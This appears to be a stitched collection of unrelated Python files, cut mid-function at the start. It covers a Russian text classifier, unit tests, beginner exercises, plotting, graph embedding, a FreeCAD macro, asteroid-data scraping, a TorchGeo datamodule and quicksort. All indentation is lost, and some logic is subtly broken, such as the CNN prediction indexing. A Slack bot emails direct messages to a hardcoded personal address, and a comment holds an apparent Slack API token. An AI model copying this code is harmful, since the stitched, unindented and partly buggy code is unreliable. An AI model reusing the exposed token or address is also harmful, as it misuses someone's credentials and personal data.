print("\nЗагрузка классификатора")
with open(filenameClassifier, 'rb') as fid:
forest = cPickle.load(fid)
print(" Классификатор загружен")
return model_w2v, forest
if __name__ == '__main__':
model, classifier = init(read_source=False, read_normalize=False, load_models=True, load_classifier=True)
sentence = 'Напомним , разбить понизить, потерять, заболеть, разочаровательный, грубо губернатор Волгоградской области Андрей Бочаров.'
mas_normalized_word = normalizationOfSentence(sentence)
print(mas_normalized_word)
mas_collapsed_vectors = featurize_w2v(model, mas_normalized_word)
# $arr = classifier.predict(mas_collapsed_vectors)
# print(arr) |
# Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# type: ignore
from logging import WARNING
from unittest import TestCase
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
class TestInstrumentor(TestCase):
class Instrumentor(BaseInstrumentor):
def _instrument(self, **kwargs):
return "instrumented"
def _uninstrument(self, **kwargs):
return "uninstrumented"
def instrumentation_dependencies(self):
return []
def test_protect(self):
instrumentor = self.Instrumentor()
with self.assertLogs(level=WARNING):
self.assertIs(instrumentor.uninstrument(), None)
self.assertEqual(instrumentor.instrument(), "instrumented")
with self.assertLogs(level=WARNING):
self.assertIs(instrumentor.instrument(), None)
self.assertEqual(instrumentor.uninstrument(), "uninstrumented")
with self.assertLogs(level=WARNING):
self.assertIs(instrumentor.uninstrument(), None)
def test_singleton(self):
self.assertIs(self.Instrumentor(), self.Instrumentor())
|
__author__ = 'samyvilar'
from test.test_back_end.test_emitter.test_statements.test_compound import TestStatements
from front_end.parser.types import CharType
from front_end.parser.ast.expressions import ConstantExpression, IntegerType
class TestCompoundAssignment(TestStatements):
def test_compound_addition(self):
code = """
{
int a = 10, b = 1;
a += b;
}
"""
self.evaluate(code)
self.assert_base_element(ConstantExpression(11, IntegerType()))
class TestPointerArithmetic(TestStatements):
def test_array_assignment(self):
code = """
{
char values[2];
values[1] = 127;
}
"""
self.evaluate(code)
self.assert_base_element(ConstantExpression(127, CharType()))
def test_pointer_subtraction_zero(self):
code = """
{
unsigned int size = -1;
struct foo {double a; int b[10];} *a = (void *)sizeof(struct foo);
size = a - 1;
}
"""
self.evaluate(code)
self.assert_base_element(ConstantExpression(0, IntegerType()))
def test_pointer_pointer_subtraction(self):
code = """
{
unsigned int index = 0;
struct foo {double a; int b[10];}
*a = (void *)0,
*b = (void *)sizeof(struct foo);
index = b - a;
}
"""
self.evaluate(code)
self.assert_base_element(ConstantExpression(1, IntegerType()))
def test_pointer_addition(self):
code = """
{
unsigned int offset = -1;
struct foo {double a; int b[10];};
struct foo *a = (void *)0;
a++;
offset = (unsigned long long)a - sizeof(struct foo);
}
"""
self.evaluate(code)
self.assert_base_element(ConstantExpression(0, IntegerType())) |
#!/usr/bin/env
#-*- coding:UTF-8 -*-
'''
Created on 2017年8月30日
@author: Administrator
'''
def printme(str):
"打印传入的字符串到标准显示设备上"
print str
return
# 调用函数
printme("我要调用用户自定义函数!");
printme("再次调用同一函数");
# import datetime
# i = datetime.datetime.now()
# print ("当前的日期和时间是 %s" % i)
# print ("ISO格式的日期和时间是 %s" % i.isoformat() )
# print ("当前的年份是 %s" %i.year)
# print ("当前的月份是 %s" %i.month)
# print ("当前的日期是 %s" %i.day)
# print ("dd/mm/yyyy 格式是 %s/%s/%s" % (i.day, i.month, i.year) )
# print ("当前小时是 %s" %i.hour)
# print ("当前分钟是 %s" %i.minute)
# print ("当前秒是 %s" %i.second)
# import time
# import calendar
#
# temptime=time.clock()
# print temptime
#
# localtime=time.localtime(time.time())
# print '本地时间为:',localtime
# print '年',localtime.tm_year
#
# # 格式化成2016-03-20 11:45:39形式
# print time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
#
# cal=calendar.month(2017,8);
# print cal
|
# A sample run on the BlogCatalog Dataset
import numpy as np
import pandas as pd
from scipy.sparse import csr_matrix
from sklearn.preprocessing import normalize
import RandNE
from eval import Precision_Np, AUC
dataset = 'blogcatalog' # blogcatalog or youtube
if __name__ == '__main__':
print('---loading dataset---')
if dataset == 'blogcatalog':
data = pd.read_csv('BlogCatalog.csv')
data = np.array(data) - 1 # change index from 0
N = np.max(np.max(data)) + 1
A = csr_matrix((np.ones(data.shape[0]), (data[:,0],data[:,1])), shape = (N,N))
A += A.T
elif dataset == 'youtube':
data = pd.read_csv('release-youtube-links.txt', sep='\t')
data = np.array(data) - 1
N = np.max(np.max(data)) + 1
A = csr_matrix((np.ones(data.shape[0]), (data[:,0],data[:,1])), shape = (N,N))
# make undirected
A += A.T
A = A - (A == 2)
# delete nodes without edges
temp_choose = np.squeeze(np.array(np.sum(A,axis=0) > 0))
A = A[temp_choose,:][:,temp_choose]
else:
raise NotImplementedError('Unsupported dataset')
# Common parameters
d = 128
Ortho = False
seed = 0
print('---calculating embedding---')
# embedding for adjacency matrix for reconstruction
q = 3
weights = [1,0.1,0.01,0.001]
U_list = RandNE.Projection(A, q, d, Ortho, seed)
U = RandNE.Combine(U_list, weights)
print('---evaluating---')
#prec = Precision_Np(A, csr_matrix((N,N)), U, U, 1e6)
#print(prec)
auc = AUC(A, csr_matrix((N,N)), U, U, 1e6)
print(auc)
# embedding for transition matrix for classification
q = 3
weights = [1,1e2,1e4,1e5]
A_tran = normalize(A, norm = 'l1', axis = 1)
U_list = RandNE.Projection(A_tran,q,d,Ortho,seed)
U = RandNE.Combine(U_list,weights)
# normalizing
U = normalize(A, norm = 'l2', axis = 1)
# Some Classification method, such as SVM in http://leitang.net/social_dimension.html
|
# 순차문
# 조건문
# 반복문
num = 1
# while num <= 10:
# print(num)
# num = num+1 # num += 1
# for, for-each
# 리스트
food = ['a','b','c','d']
foods = [food,"짬뽕","우동",'김밥']
print(foods)
for imis in foods: # ex) for-each
print(imis)
for i in range(0,4,1): # 0~3까지 1씩증가한다
print(foods[i])
a = foods[0]
print(a[i])
print(foods[0][i]) |
import numpy as np
import matplotlib.pyplot as plt
y1 = [10.1,7.95,7.0,6.5,6.3,6.1,6.0,5.8,5.75,5.5,
5.45,5.4,5.3,5.2,5.18,5.1,5.12,5.1,6.08,7.01,8.8]
y2 = [9.5,4.5,6.1,5.2,4.1,4,5,5.5,5.5,6,6,5.5,4.5,4,
4,4.5,5.5,4.5,5,5,5]
xticklabels = map(str, np.arange(21) + 5)
yticks = range(4,11)
xlabel = 'Foo'
ylabel = 'Bar'
curveLabels = ['Curve A', 'Curve B']
plt.figure(figsize=(9,4))
plt.plot(y1, '-D', label=curveLabels[0], color='#555555',
lw=2, markeredgecolor='None', markersize=6,
zorder=10, clip_on=False)
plt.plot(y2, '-s', label=curveLabels[1], color='#AAAAAA',
lw=2, markeredgecolor='None', markersize=8,
zorder=11, clip_on=False)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.yticks(yticks)
plt.xticks(np.arange(len(y1)), xticklabels, rotation='45')
legend = plt.legend(fontsize=16, bbox_to_anchor=(0.95,0.955),
numpoints=1, borderpad=0.9, handlelength=3)
frame = legend.get_frame()
frame.set_facecolor('white')
frame.set_edgecolor('white')
plt.gca().xaxis.grid(False)
plt.gca().yaxis.grid(True, color='black', linestyle='-')
plt.xlim(-0.5, len(y1)-0.5)
plt.ylim(4, 10.5)
plt.gca().spines['top'].set_visible(False)
plt.gca().spines['right'].set_visible(False)
plt.gca().get_xaxis().tick_bottom()
plt.gca().get_yaxis().tick_left()
for tic in plt.gca().xaxis.get_major_ticks():
tic.tick1On = tic.tick2On = False
plt.gca().tick_params(axis='y', direction='out')
plt.gca().spines['left'].set_linewidth(2)
plt.gca().spines['left'].set_color('#888888')
plt.gca().spines['bottom'].set_linewidth(2)
plt.gca().spines['bottom'].set_color('#888888')
plt.gca().yaxis.set_tick_params(width=2, length=5,
color='#888888')
|
import numpy
import sys
def get_base(num):
base = int(numpy.sqrt(num))
if base % 2 == 0:
return base - 1
return base
def run(num):
base = get_base(num)
min_dist = base/2 + 1
start = base**2 + min_dist
print ((num - start) % min_dist + min_dist)
if __name__ == '__main__':
number = sys.argv[1]
run(int(number))
|
#@+leo-ver=5-thin
#@+node:ekr.20230710105542.1: * @file ../unittests/commands/test_commanderFileCommands.py
"""Tests of leo.commands.leoConvertCommands."""
import os
import tempfile
import textwrap
from typing import Any
from leo.core import leoGlobals as g
from leo.core.leoTest2 import LeoUnitTest
assert g
assert textwrap
#@+others
#@+node:ekr.20230710105810.1: ** class TestRefreshFromDisk (LeoUnitTest)
class TestRefreshFromDisk (LeoUnitTest):
#@+others
#@+node:ekr.20230710105853.1: *3* TestRefreshFromDisk.test_refresh_from_disk
def test_refresh_from_disk(self):
c = self.c
at = c.atFileCommands
p = c.p
def dummy_precheck(fileName: str, root: Any) -> bool:
"""A version of at.precheck that always returns True."""
return True
at.precheck = dummy_precheck # Force all writes.
# Define data.
raw_contents = '"""Test File"""\n'
altered_raw_contents = '"""Test File (changed)"""\n'
# Create a writable directory.
directory = tempfile.gettempdir()
# Run the tests.
for kind in ('clean', 'file'):
file_name = f"{directory}{os.sep}test_at_{kind}.py"
p.h = f"@{kind} {file_name}"
for pass_number, contents in (
(0, raw_contents),
(1, altered_raw_contents),
):
p.b = contents
msg = f"{pass_number}, {kind}"
# Create the file (with sentinels for @file).
if kind == 'file':
at.writeOneAtFileNode(p)
file_contents = ''.join(at.outputList)
else:
file_contents = contents
with open(file_name, 'w') as f:
f.write(file_contents)
with open(file_name, 'r') as f:
contents2 = f.read()
self.assertEqual(contents2, file_contents, msg=msg)
c.refreshFromDisk(event=None)
self.assertEqual(p.b, contents, msg=msg)
# Remove the file.
self.assertTrue(os.path.exists(file_name), msg=file_name)
os.remove(file_name)
self.assertFalse(os.path.exists(file_name), msg=file_name)
#@-others
#@-others
#@-leo
|
__author__ = 'naveenkumar'
import requests
import copy
import datetime
import json
from django.core.mail import EmailMultiAlternatives
class SlackBot(object):
def __init__(self, settings):
self._TOKEN = settings['TOKEN']
self._BASE_ENDPOINT = "https://slack.com"
self._PARAMS = {'token': self._TOKEN}
def get_imc_list(self):
url = self._BASE_ENDPOINT + "/api/im.list"
res = requests.get(url, params=self._PARAMS)
return json.loads(res.text).get('ims')
def get_user_info(self, id):
url = self._BASE_ENDPOINT + "/api/users.info"
params = copy.deepcopy(self._PARAMS)
params.update({'user': id})
res = requests.get(url, params=params)
return json.loads(res.text).get('user')
def get_messages_from_imc(self,imc_id):
url = self._BASE_ENDPOINT + "/api/im.history"
params = copy.deepcopy(self._PARAMS)
date = datetime.datetime.now() - datetime.timedelta(days=2)
timestamp = totimestamp(date)
params.update({
'channel': imc_id,
'oldest': timestamp,
'count': 1000
})
res = requests.get(url, params=params)
return json.loads(res.text)
def get_messages_from_imcs(self):
im_messages = []
imc_list = self.get_imc_list()
for imc in imc_list:
user_info = self.get_user_info(imc.get('user'))
im_id = imc.get('id')
messages = self.get_messages_from_imc(im_id)
messages_to_send = []
for message in reversed(messages.get('messages')):
messages_to_send.append(message.get('text'))
im_messages.append({
'user': {
'name': user_info.get('name') if user_info.get('name') is not None else user_info.get('profile').get('real_name')
},
'messages': messages_to_send
})
body = ""
for item in im_messages:
body = body + '{name} - {res}\n'.format(name=item['user']['name'], res=item['messages'])
#print(im_messages)
subject = "SLACK CHAT: " + datetime.datetime.now().strftime("%d %m %Y")
send_to = ["naveen.nitk2009@gmail.com"]
msg = EmailMultiAlternatives(subject, json.dumps(body),
"myslackbot@slackbot.com", send_to)
msg.send()
return
def totimestamp(dt, epoch=datetime.datetime(1970,1,1)):
td = dt - epoch
# return td.total_seconds()
return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6
# if __name__ == "__main__":
# sbot = SlackBot(settings={'TOKEN': "xoxp-2526871921-13207990918-16823177588-bb0c66d389"})
# sbot.get_messages_from_imcs() |
def primo(num):
for i in range(2, num):
if num % i == 0: # Si el residuo es 0:
return False # El número no es primo
return True # Si no, es primo
numero = int(input("Introduzca un número: "))
if primo(numero):
print("Es primo (solo tiene dos divisores)")
else:
print("No es primo (tiene más de dos divisores)")
|
import numpy as np
import tflearn
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.estimator import regression
from tflearn.data_preprocessing import ImagePreprocessing
from tflearn.data_augmentation import ImageAugmentation
import h5py
class CNN:
def __init__(self):
self.trained_model = None
def build_training_dataset(self,path):
"""Build hdf5 file from collection of images and labels
Parameters
----------
path: string
Path to text file with content "path/to/image label"
"""
from tflearn.data_utils import build_hdf5_image_dataset as hdf5
hdf5(path,image_shape=(32,32),mode='file',output_path='training_data/training_dataset.h5',categorical_labels=True, grayscale=False)
def network(self):
"""Build the training neural network
Returns
-------
network: tensor
the network tensor
"""
network = input_data(shape=[None,32,32,3])
# 32 convolution filters with size 3 and stride 1
network = conv_2d(network,32,3,activation='relu')
# max pooling layer with kernel size of 2
network = max_pool_2d(network,2)
# 64 convolution filter with size 3 and stride 1
network = conv_2d(network,64,3,activation='relu')
# max pooling layer with kernel size of 2
network = max_pool_2d(network,2)
# fully connected neural network with 512 nodes
network = fully_connected(network,512,activation='relu')
# fully connected neural network with 6 nodes
network = fully_connected(network,7,activation='softmax')
# classifier
network = regression(network,optimizer='adam',loss='categorical_crossentropy',learning_rate=0.01)
return network
def train(self,path,num_iters=1000,save=False):
"""Train the network with input data
Parameters
----------
path: string
Path of the .h5 dataset
"""
f=h5py.File(path,'r')
X = f['X'][()]
Y = f['Y'][()]
network = self.network()
# wrapping the network in deep learning model
model = tflearn.DNN(network,tensorboard_verbose=1)
# start training
model.fit(X,Y,n_epoch=num_iters,shuffle=True,show_metric=True,batch_size=100,snapshot_epoch=True,run_id='autocar')
# save the model in the instance
self.trained_model = model
if save==True:
# save the model in a file
model.save('training_data/trained_model.tf')
def load_model(self,model_path):
"""
Parameters
----------
model_path: string
Path to the saved model file
"""
model = tflearn.DNN(self.network())
model.load(model_path)
self.trained_model = model
def predict(self,X):
"""Make predictions after trained model is loaded
Parameters
----------
X: ndarray()
Image of size 64x64
"""
vector = self.trained_model.predict(X)
prob = max(vector)
index = [i for i, j in enumerate(vector) if j == vector]
direction = ""
if index == 0:
direction = "Forward Right"
elif index == 1:
direction = "Forward Left"
elif index == 2:
direction = "Forward"
elif index == 3:
direction = "Right"
elif index == 4:
direction = "Left"
elif index == 5:
direction = "Backwards"
print direction
return vector
|
def add(a,b):
return(a+b)
def sub(a,b):
return(a-b)
def mul(a,b):
return(a*b)
def division(a,b):
return(a/b)
a=int(input("enter a value:"))
b=int(input("enter b value:"))
print(add(a,b))
print(sub(a,b))
print(mul(a,b))
print(division(a,b))
|
import pandas as pd
def create_dataframe(csv_file):
### This takes in a csv from StreetEasy and turns the date columns into values.
### Finally the variable column is changed to a date-time column, which is then
### used as the index
new_data = pd.melt(csv_file,id_vars=['areaName','Borough', 'areaType'])
new_data['variable'] = pd.to_datetime(new_data['variable'], infer_datetime_format=True)
new_data.set_index('variable', inplace=True)
return new_data
def select_borough_data(dataframe, borough):
### Selects data by borough. Acceptable inputs are listed below:
### Manhattan, Bronx, Brooklyn, Queens, Staten Island
new_data = dataframe[dataframe['Borough'] == borough]
new_data = new_data[new_data['areaType']=='borough']
return new_data
def describe_data(dataframe):
data_max = dataframe['value'].max()
data_min = dataframe['value'].min()
data_min_year = str(dataframe[dataframe['value']==data_min].index[0]).split(" ")[0][:4]
data_max_year = str(dataframe[dataframe['value']==data_max].index[0]).split(" ")[0][:4]
time_from_min_max = int(data_max_year) - int(data_min_year)
percentage_increase = (((data_max - data_min) / data_min))
st1 = 'The lowest median asking price was ${:0,.0f}' ' which was in the year {}.'.format(data_min, data_min_year)
st2 = 'The highest median asking price was ${:0,.0f}' ' which was in the year {}.'.format(data_max, data_max_year)
st3 = 'Over the course of {} years (between {} and {}), the asking price has increased by {:.1%}.'.format(time_from_min_max, data_min_year, data_max_year,percentage_increase)
final_str = st1 + ' ' + st2 + ' ' + st3
return final_str
def calculate_asking_price_change(dataframe, starting_year_and_month, ending_year_and_month):
if starting_year_and_month > ending_year_and_month:
return 'Starting Year needs to be before the ending year. Try switching the numbers.'
starting_data = int(dataframe.loc[starting_year_and_month]['value'])
ending_data = int(dataframe.loc[ending_year_and_month]['value'])
ret = ((ending_data - starting_data) / starting_data)
st1 = 'The median asking price from {} to {} went from {:0,.0f} to {:0,.0f}.'.format(starting_year_and_month, ending_year_and_month, starting_data, ending_data )
st2 = 'This represented a percentage change of {:.1%}.'.format(ret)
final_str = st1 + ' ' + st2
return final_str
|
import FreeCAD as App
import FreeCADGui as Gui
import Part
import math as Math
from pivy.coin import *
from PySide import QtGui, QtCore # https://www.freecadweb.org/wiki/PySide
def MyNewApp():
# neue Datei erzeugen wenn nicht vorhanden
if not(App.ActiveDocument):
#Create new document
App.newDocument("merzi")
App.setActiveDocument("merzi")
App.ActiveDocument=App.getDocument("merzi")
Gui.ActiveDocument=Gui.getDocument("merzi")
class MerziLinie:
def Activated(self):
# neue Datei erzeugen wenn nicht vorhanden
MyNewApp()
self.view = Gui.ActiveDocument.ActiveView
self.stack = []
self.callback = self.view.addEventCallbackPivy(SoMouseButtonEvent.getClassTypeId(),self.getpoint)
def GetResources(self):
return {'MenuText': 'Line', 'ToolTip': 'Creates a line by clicking 2 points on the screen'}
def getpoint(self,event_cb):
event = event_cb.getEvent()
if event.getState() == SoMouseButtonEvent.DOWN:
pos = event.getPosition()
point = self.view.getPoint(pos[0],pos[1])
self.stack.append(point)
if len(self.stack) == 2:
l = Part.LineSegment(self.stack[0],self.stack[1])
shape = l.toShape()
Part.show(shape)
self.view.removeEventCallbackPivy(SoMouseButtonEvent.getClassTypeId(),self.callback)
class makeKugellager:
def Activated(self):
# neue Datei erzeugen wenn nicht vorhanden
MyNewApp()
# Aufruf Funktion
self.callback = self.KugellagerZeichnen()
def GetResources(self):
return {'MenuText': 'Kugellager', 'ToolTip': '...'}
def KugellagerZeichnen(self):
#VALUES#
#(radius of shaft/inner radius of inner ring)
R1=15.0
#(outer radius of inner ring)
R2=25.0
#(inner radius of outer ring)
R3=30.0
#(outer radius of outer ring)
R4=40.0
#(thickness of bearing)
TH=15.0
#(number of balls)
NBall=15
#(radius of ball)
RBall=5.0
#(rounding radius for fillets)
RR=1
#first coordinate of center of ball
CBall=((R3-R2)/2)+R2
#second coordinate of center of ball
PBall=TH/2
#Inner Ring#
B1=Part.makeCylinder(R1,TH)
B2=Part.makeCylinder(R2,TH)
IR=B2.cut(B1)
#get edges and apply fillets
Bedges=IR.Edges
IRF=IR.makeFillet(RR,Bedges)
#create groove and show shape
T1=Part.makeTorus(CBall,RBall)
T1.translate(App.Vector(0,0,TH/2))
InnerRing=IRF.cut(T1)
Part.show(InnerRing)
#
#Outer Ring#
B3=Part.makeCylinder(R3,TH)
B4=Part.makeCylinder(R4,TH)
OR=B4.cut(B3)
#get edges and apply fillets
Bedges=OR.Edges
ORF=OR.makeFillet(RR,Bedges)
#create groove and show shape
T2=Part.makeTorus(CBall,RBall)
T2.translate(App.Vector(0,0,TH/2))
OuterRing=ORF.cut(T2)
Part.show(OuterRing)
#
#Balls#
for i in range(NBall):
Ball=Part.makeSphere(RBall)
Alpha=(i*2*Math.pi)/NBall
BV=(CBall*Math.cos(Alpha),CBall*Math.sin(Alpha),TH/2)
Ball.translate(BV)
Part.show(Ball)
#
#Make it pretty#
Gui.SendMsgToActiveView("ViewFit")
class makeBalken:
def Activated(self):
# neue Datei erzeugen wenn nicht vorhanden
MyNewApp()
dialog = QtGui.QFileDialog(
QtGui.qApp.activeWindow(),
"Select FreeCAD document to import part from"
)
# Aufruf Funktion
self.callback = self.BalkenZeichnen()
def GetResources(self):
return {'MenuText': 'Balken', 'ToolTip': 'Balken zeichenen'}
def BalkenZeichnen(self):
print("asdf")
return()
Gui.addCommand('MerziLinie', MerziLinie())
Gui.addCommand('makeKugellager', makeKugellager())
Gui.addCommand('makeBalken', makeBalken())
|
import numpy as np
import scipy as sp
import scipy.linalg
world = np.loadtxt('world.txt')
image = np.loadtxt('image.txt')
world = np.concatenate([world, np.ones((1, 10))])
image = np.concatenate([image, np.ones((1, 10))])
A = np.zeros((0, 12))
for i in range (10):
x = image [ : , i]
X = world [ : , i]
a1 = np.concatenate([np.zeros(4), -x[2] * X, x[1] * X]).reshape(1, -1)
a2 = np.concatenate([x[2] * X, np.zeros(4), -x[0] * X]).reshape(1, -1)
A = np.concatenate([A, a1, a2])
u, d, v = np.linalg.svd(A)
p = v[d.argmin()].reshape((3, 4))
print('P is: ', p)
# verify re-projection
image_p = p.dot(world)
image_p = image_p / image_p[2]
print ('re-projection', image_p)
u, d, v = np.linalg.svd(p)
c = v[3]
print ('C is:', c)
k, r = sp.linalg.rq(p, mode='economic')
r_ = r [:, -1]
r_ = r [:, :-1]
t= r[:, -1]
c2 = np.linalg.solve(r_, -t)
print('verified C is:', c2) # [ 1. -1. -1.]
|
""" Mpdule to interface with the MPC website
"""
import json
import logging
import pprint
import re
import urllib.error
import urllib.parse
import urllib.request
from os import path, makedirs
import target
logger = logging.getLogger(__name__)
appdatadir = path.expandvars(r'%LOCALAPPDATA%\AutoSkyX')
if not path.exists(appdatadir):
makedirs(appdatadir)
class MPCweb(object):
""" Class to interface with the MPC website
"""
def __init__(self, pcp="http://www.minorplanetcenter.net/iau/NEO/pccp.txt",
neocp="http://www.minorplanetcenter.net/iau/NEO/neocp.txt",
crits="http://www.minorplanetcenter.net/iau/Ephemerides/CritList/Soft06CritList.txt"):
self.pcp = pcp
self.neocp = neocp
self.crits = crits
def get_pcp(self):
""" Get the Potential Comet data.
"""
data = urllib.request.urlopen(self.pcp)
for line in data:
logger.debug(line)
def get_neocp(self):
""" Get the NEOCP data
"""
data = urllib.request.urlopen(self.neocp).readlines()
regex = re.compile("^(.{7}) (.{3}) (.{12}) (.{8}) (.{8}) (.{4})" +
" (.{22}) (.{7}) (.{3}) (.{6}) (.{4})")
my_neos = []
for line in data:
res = regex.match(line.decode('UTF-8'))
my_neo = target.target(res.group(1).strip())
my_neo.addneoprops(res.group(2), res.group(3),
res.group(4), res.group(5), res.group(6),
res.group(7), res.group(8), res.group(9),
res.group(10), res.group(11))
my_neos.append(my_neo)
return my_neos
def get_crits(self):
""" Get the Critical List data.
"""
data = urllib.request.urlopen(self.crits).readlines()
regex = re.compile(
"^(.{21})\|(.{14})\|(.{10})\|(.{8})\|(.{8})\|(.{9})\|(.{9})\|(.{5})\|(.{10})\|(.{5})\|(.{5})")
crits = []
for line in data:
res = regex.match(line.decode('UTF-8'))
logger.debug(line)
logger.debug(res.group(2))
crit = target.target(res.group(1).strip(), ttype="mp")
logger.debug(res.group(2) + " " + res.group(3) + " " +
res.group(4) + " " + res.group(5) + " " +
res.group(6) + " " + res.group(7) + " " +
res.group(9) + " " + res.group(10) + " " +
res.group(11))
crit.addcritprops(res.group(2), res.group(3), res.group(4),
res.group(5), res.group(6), res.group(7),
res.group(9), res.group(10), res.group(11))
crits.append(crit)
return crits
def gen_findorb(self, neocplist):
""" Generate the FindOrb format database.
"""
findorbdb = ""
for item in neocplist:
url = "http://scully.cfa.harvard.edu/cgi-bin/showobsorbs.cgi?Obj=" \
+ item.tmpdesig + "&obs=y"
data = urllib.request.urlopen(url)
for line in data:
if "html" not in line:
findorbdb = findorbdb + line
return findorbdb
def unpack_epoch(self, packed):
""" Unpack the MPC epoch format.
"""
ehash = {'1': '01',
'2': '02',
'3': '03',
'4': '04',
'5': '05',
'6': '06',
'7': '07',
'8': '08',
'9': '09',
'A': '10',
'B': '11',
'C': '12',
'D': '13',
'E': '14',
'F': '15',
'G': '16',
'H': '17',
'I': '18',
'J': '19',
'K': '20',
'L': '21',
'M': '22',
'N': '23',
'O': '24',
'P': '25',
'Q': '26',
'R': '27',
'S': '28',
'T': '29',
'U': '30',
'V': '31'}
regex = re.compile("(.)(..)(.)(.)")
matches = regex.match(packed)
year = ehash[matches.group(1)] + matches.group(2)
month = ehash[matches.group(3)]
day = ehash[matches.group(4)]
datestr = year + " " + month + " " + day + ".000"
return datestr
def gen_smalldb(self, neocplist, download=False):
""" Download orbit data, store it in objects, and return a smalldb.
"""
smalldb = ""
for item in neocplist:
if item.ttype == "neo":
# g should be populated if we got the orbit data before
if download == True:
url = "https://cgi.minorplanetcenter.net/cgi-bin/showobsorbs.cgi?Obj=" \
+ item.tmpdesig + "&orb=y"
logger.debug(url)
data = urllib.request.urlopen(url).readlines()
for line in data:
line = line.decode("UTF-8")
if "NEOCPNomin" in line:
values = line.split()
item.addorbitdata(values[1], values[2],
self.unpack_epoch(values[3]),
values[4], values[5], values[6],
values[7], values[8], values[9],
values[10])
dbline = " %-19.19s|%-14.14s|%8.6f |%8f|%8.4f|%8.4f |%8.4f| 2000|%9.4f |%5.2f|%-5.2f| 0.00\n" % (
values[0], self.unpack_epoch(values[3]),
float(values[8]), float(values[10]),
float(values[7]), float(values[6]),
float(values[5]), float(values[4]),
float(values[1]), float(values[2]))
logger.debug(dbline)
smalldb = smalldb + dbline
break
else:
# We already have it. Return the db ine
dbline = " %-19.19s|%-14.14s|%8.6s |%8s|%8.4s|%8.4s |%8.4s| 2000|%9.4s |%5.2s|%-5.2s| 0.00\n" % (
item.tmpdesig, item.epoch, item.e, item.a, item.incl,
item.node, item.peri, item.m, item.h, item.g)
logger.debug(dbline)
smalldb = smalldb + dbline
elif item.ttype == "mp": # regular minor planet
dbline = " %-19.19s|%-14.14s|%8.6f |%8f|%8.4f|%8.4f |%8.4f| 2000|%9.4f |%5.2f|%-5.2f| 0.00\n" % (
item.tmpdesig, item.epoch, float(item.e), float(item.a),
float(item.incl), float(item.node), float(item.peri),
float(item.m), float(item.h), float(item.g))
logger.debug(item.peri)
logger.debug(type(item.peri))
logger.debug(dbline)
smalldb = smalldb + dbline
else:
# TODO possibly go to skyx if we can
pass
# Write everything we know to the neocplist file
with open(path.join(appdatadir, "neocplist")) as json_file:
cache = json.load(json_file)
outlist = []
for item in neocplist:
outlist.append(item.__dict__)
for item in cache:
f = filter(lambda desig: desig['tmpdesig'] == item.tmpdesig, outlist)
if not f:
outlist.append(item)
with open(path.join(appdatadir, "neocplist"), 'w') as outfile:
json.dump(outlist, outfile)
return smalldb
def updatefromcache(self, neocplist):
with open(path.join(appdatadir, "neocplist")) as json_file:
cache = json.load(json_file)
for item in neocplist:
print(item)
print(item.tmpdesig)
for c in cache:
print(c)
if item.tmpdesig == c['tmpdesig']:
item.addorbitdata(c['h'], c['g'], c['epoch'], c['m'],
c['peri'], c['node'], c['incl'],
c['e'], c['n'], c['a'])
if __name__ == "__main__":
MPC = MPCweb()
NEOS = MPC.get_neocp()
for neo in NEOS:
pprint.pprint(vars(neo))
|
'''
Created on Jan 25, 2017
@author: wans
'''
from nltk.corpus import stopwords
# import nltk
# nltk.download('all', halt_on_error=False)
# nltk.download()
sw = stopwords.words('english')
print(len(sw))
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
"""FAIR1M datamodule."""
from typing import Any
import torch
from torch import Tensor
from ..datasets import FAIR1M
from .geo import NonGeoDataModule
def collate_fn(batch: list[dict[str, Tensor]]) -> dict[str, Any]:
"""Custom object detection collate fn to handle variable boxes.
Args:
batch: list of sample dicts return by dataset
Returns:
batch dict output
.. versionadded:: 0.5
"""
output: dict[str, Any] = {}
output["image"] = torch.stack([sample["image"] for sample in batch])
if "boxes" in batch[0]:
output["boxes"] = [sample["boxes"] for sample in batch]
if "label" in batch[0]:
output["label"] = [sample["label"] for sample in batch]
return output
class FAIR1MDataModule(NonGeoDataModule):
"""LightningDataModule implementation for the FAIR1M dataset.
.. versionadded:: 0.2
"""
def __init__(
self, batch_size: int = 64, num_workers: int = 0, **kwargs: Any
) -> None:
"""Initialize a new FAIR1MDataModule instance.
Args:
batch_size: Size of each mini-batch.
num_workers: Number of workers for parallel data loading.
**kwargs: Additional keyword arguments passed to
:class:`~torchgeo.datasets.FAIR1M`.
.. versionchanged:: 0.5
Removed *val_split_pct* and *test_split_pct* parameters.
"""
super().__init__(FAIR1M, batch_size, num_workers, **kwargs)
self.collate_fn = collate_fn
def setup(self, stage: str) -> None:
"""Set up datasets.
Args:
stage: Either 'fit', 'validate', 'test', or 'predict'.
"""
if stage in ["fit"]:
self.train_dataset = FAIR1M(split="train", **self.kwargs)
if stage in ["fit", "validate"]:
self.val_dataset = FAIR1M(split="val", **self.kwargs)
if stage in ["predict"]:
# Test set labels are not publicly available
self.predict_dataset = FAIR1M(split="test", **self.kwargs)
|
def quicksort(nums):
if len(nums) <= 1:
return nums
else:
return quicksort([i for i in nums if i < nums[0]]) + [i for i in nums if i == nums[0]] + quicksort([i for i in nums if i > nums[0]])
nums = [3,1,4,5,2,4]
print(quicksort(nums))
def partition(nums,l,r):
pivot = nums[l]
while l < r:#因为取的是最左边的节点,所以要从右边开始遍历
while l < r and nums[r] >= pivot:
r -= 1
nums[l]=nums[r]
while l < r and nums[l] <= pivot:
l+=1
nums[r]=nums[l]
nums[l] = pivot
return l
def quicksort(nums, l, r):
if l < r:
pivot = partition(nums,l,r)
quicksort(nums,l,pivot-1)
quicksort(nums,pivot+1,r)
return nums
print(quicksort([2,1,23,2,4,5], 0, 5))
import random
def quicksort(nums, l, r):
if l < r:
pivot = partition(nums, l, r)
quicksort(nums,l,pivot-1)
quicksort(nums,pivot+1,r)
return nums
def partition(nums,l,r):
index = random.choice(range(l,r+1))
nums[l], nums[index] = nums[index], nums[l]
pivot = nums[l]
